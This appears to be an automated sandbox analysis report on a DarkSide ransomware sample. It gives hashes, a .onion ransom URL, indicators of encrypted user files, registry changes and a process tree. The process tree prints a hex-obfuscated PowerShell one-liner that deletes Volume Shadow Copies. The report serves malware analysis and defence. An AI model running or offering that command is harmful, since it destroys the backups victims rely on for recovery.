Analysis
-
max time kernel
161s -
max time network
161s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
31-01-2022 05:58
Static task
static1
Behavioral task
behavioral1
Sample
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe
Resource
win10-en-20211208
General
-
Target
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe
-
Size
59KB
-
MD5
66ddb290df3d510a6001365c3a694de2
-
SHA1
77b9103d4af311ba76511144d47aed440ae6ce9f
-
SHA256
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39
-
SHA512
bd1ecb3ce3e49c495f354a27fd17089b2bc77e3a96b15f28be4c877d2e49dfa1c193a3370a84ec4060f1c2517b2338e2b11cae680e67e9fb5e59367efb67a7ee
Malware Config
Extracted
C:\\README.08e0b4c3.TXT
darkside
http://darksidfqzcuhtk2.onion/45FYQLKAX0QTR144EDUI3VOVH2B3SQ0TZM0G7MXX3YUGDSA3AZA9XNNTCMD1H4CN
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 23 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exedescription ioc process File renamed C:\Users\Admin\Pictures\BlockStep.crw => C:\Users\Admin\Pictures\BlockStep.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\PopInitialize.crw => C:\Users\Admin\Pictures\PopInitialize.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\PopInitialize.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\UndoConfirm.raw => C:\Users\Admin\Pictures\UndoConfirm.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\AddExport.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\DisconnectRepair.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\InstallUnblock.raw => C:\Users\Admin\Pictures\InstallUnblock.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\InstallUnblock.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\UndoConfirm.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\BlockStep.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\ConvertConnect.png.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\ConvertToSwitch.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\ExportTest.tiff f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\ExportTest.tiff => C:\Users\Admin\Pictures\ExportTest.tiff.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\MoveResume.tif => C:\Users\Admin\Pictures\MoveResume.tif.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\MoveResume.tif.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\PopGrant.raw => C:\Users\Admin\Pictures\PopGrant.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\AddExport.crw => C:\Users\Admin\Pictures\AddExport.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\ConvertConnect.png => C:\Users\Admin\Pictures\ConvertConnect.png.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\ConvertToSwitch.crw => C:\Users\Admin\Pictures\ConvertToSwitch.crw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File renamed C:\Users\Admin\Pictures\DisconnectRepair.raw => C:\Users\Admin\Pictures\DisconnectRepair.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\ExportTest.tiff.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe File opened for modification C:\Users\Admin\Pictures\PopGrant.raw.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\08e0b4c3.BMP" f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\08e0b4c3.BMP" f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exepid process 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Modifies Control Panel 1 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallpaperStyle = "10" f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Modifies registry class 5 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\08e0b4c3.ico" f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3\ = "08e0b4c3" f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exepowershell.exepid process 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeSecurityPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeTakeOwnershipPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeLoadDriverPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeSystemProfilePrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeSystemtimePrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeProfSingleProcessPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeIncBasePriorityPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeCreatePagefilePrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeBackupPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeRestorePrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeShutdownPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeDebugPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeSystemEnvironmentPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeRemoteShutdownPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeUndockPrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeManageVolumePrivilege 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: 33 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: 34 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: 35 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: 36 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeBackupPrivilege 3384 vssvc.exe Token: SeRestorePrivilege 3384 vssvc.exe Token: SeAuditPrivilege 3384 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exedescription pid process target process PID 2180 wrote to memory of 4032 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe powershell.exe PID 2180 wrote to memory of 4032 2180 f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe"C:\Users\Admin\AppData\Local\Temp\f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3384
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
MD5
83485dce1084c2622e5b7e811de19522
SHA15b4a73ec6ae77a8d1e598d894a202c40f1cc8b2b
SHA256245b075a9e2e0c8f2d76522649a8fc0e3104069ef9b0629817559be37befc959
SHA512773f3225550c40096f1ec3b623e5dad22c6031daae1b2a8c6ff801d5769127ca6717280fd6b903412470760d0b80795e1bf42b82b38b66b64e4434b2d2b9c3ec